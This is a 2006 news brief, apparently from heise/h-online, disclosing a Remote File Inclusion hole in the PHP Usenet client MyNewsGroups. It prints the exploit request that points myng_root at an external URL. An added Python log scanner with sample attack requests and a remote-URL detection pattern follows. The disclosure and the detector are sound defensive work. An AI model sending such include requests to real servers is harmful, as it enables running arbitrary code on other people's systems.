In association with heise online

01 August 2006, 13:23

Usenet application MyNewsGroups endangers server security


Usenet clients that use a Web interface are practical and flexible. But servers running MyNewsGroups, an open source client written in PHP, may soon be receiving some unexpected company. Philipp Niedziela has discovered a hole that allows arbitrary scripts to be executed on servers via Remote File Inclusion. The problem is the result of a flaw in the filtering of the variable myng_root, through which a path can be put into scripts by means of a request such as

http://server/lib/tree/layersmenu.inc.php?myng_root=externe_url

The flaw affects versions up to and including 0.6b. Niedziela says that the problem is solved when the variable myng_root is permanently assigned a value. For further details, see his report.
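An added example (not from Niedziela's report or the MyNewsGroups project): a Python scan of web server access logs for requests that set myng_root, marking those whose value points at a remote location rather than a local path. The log format, the sample lines and the function and constant names are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl

PARAM = "myng_root"  # variable named in the article
# Request line of a common/combined-format access log entry (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Value that points off-host (scheme://, //host, \\host) or uses data: instead of a local path.
REMOTE_RE = re.compile(r'^\s*(?:[a-z][a-z0-9+.\-]*://|//|\\\\|data:)', re.IGNORECASE)

def scan(lines):
    """Return (line_no, path, value, is_remote) for each request that sets PARAM."""
    findings = []
    for line_no, line in enumerate(lines, start=1):
        match = REQUEST_RE.search(line)
        if not match:
            continue  # not a parsable request line
        target = urlsplit(match.group(1))
        # parse_qsl percent-decodes once, as PHP does before the script sees the value.
        for name, value in parse_qsl(target.query, keep_blank_values=True):
            # Treat the array form myng_root[]=... as the same parameter.
            if name.split("[", 1)[0] == PARAM:
                findings.append((line_no, target.path, value, bool(REMOTE_RE.match(value))))
    return findings

# Constructed sample log lines (documentation addresses, reserved .invalid host).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2006:13:00:01 +0200] "GET /index.php HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Aug/2006:13:02:44 +0200] '
    '"GET /lib/tree/layersmenu.inc.php?myng_root=http://example.invalid/ HTTP/1.0" 200 312',
    '198.51.100.7 - - [01/Aug/2006:13:02:51 +0200] '
    '"GET /lib/tree/layersmenu.inc.php?x=1&myng_root=hTTp%3A%2F%2Fexample.invalid%2F HTTP/1.0" 200 312',
    '203.0.113.5 - - [01/Aug/2006:13:05:10 +0200] '
    '"GET /lib/tree/layersmenu.inc.php?myng_root=/srv/myng HTTP/1.1" 200 298',
]

if __name__ == "__main__":
    for line_no, path, value, is_remote in scan(SAMPLE_LOG):
        label = "remote include attempt" if is_remote else "request-supplied value"
        print(f"line {line_no}: {label}: {path} {PARAM}={value!r}")
```

Requests that supply myng_root with a local-looking value are reported as well, since the fix described above leaves no reason for the variable to come from a request at all.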


(ehe)

Permalink: http://h-online.com/-731302